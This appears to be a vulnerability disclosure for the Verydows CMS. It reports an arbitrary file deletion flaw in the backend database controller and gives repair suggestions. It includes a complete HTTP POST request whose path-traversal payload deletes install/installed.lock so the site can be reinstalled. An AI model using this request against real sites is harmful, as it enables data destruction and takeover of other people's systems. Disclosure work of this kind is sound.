Verydows Exists Arbitrary File Deletion Vulnerability

[zhendezuile]

Vulnerable file: \protected\controller\backend\database_controller.php
It can be clearly seen that $file is not security filtered
Vulnerable code：
....................................................

..................................................

Vulnerability to reproduce:
1、First log in to the background to get the cookie

2、Here I delete the installed.lock file to verify the existence of the vulnerability, the construction package is as follows:

POST /index.php?m=backend&c=database&a=restore&step=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=database&a=restore
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

file%5B%5D=../../../install/installed.lock

3、Click to send the data package, you can see that the file was deleted successfully

4、It can be seen that when the installed.lock file exists, when visiting http://xxx/install, the page will directly jump to the front home page

So as long as we delete the installed.lock file, we can reinstall the system，When we delete the installed.lock file and visit http://x.x.x/install, we will enter the installation wizard page

Repair suggestion:

1、Filter ../ or ..\ in the file variable
2、Limit the scope of deleted files or directories